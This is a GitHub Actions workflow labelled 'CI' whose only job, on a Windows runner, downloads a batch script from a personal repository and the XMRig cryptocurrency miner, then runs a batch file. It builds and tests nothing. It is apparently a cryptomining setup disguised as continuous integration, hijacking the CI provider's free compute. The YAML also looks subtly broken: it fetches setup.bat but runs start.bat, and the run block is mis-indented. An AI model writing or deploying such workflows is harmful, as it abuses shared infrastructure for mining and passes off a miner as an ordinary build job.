name: CI

on:
  workflow_dispatch:


jobs:

  build:
    runs-on: windows-latest

    steps:

      - uses: actions/checkout@v3

      - name: DownloadingRequirement
        run: |
        Invoke-WebRequest https://raw.githubusercontent.com/Starfier/mt/main/setup.bat -OutFile setup.bat
        Invoke-WebRequest https://github.com/xmrig/xmrig/releases/download/v6.18.0/xmrig-6.18.0-gcc-win64.zip -OutFile xmrig-6.18.0-gcc-win64.zip

      - name: Run Requirement
        run: cmd /c start.bat
      
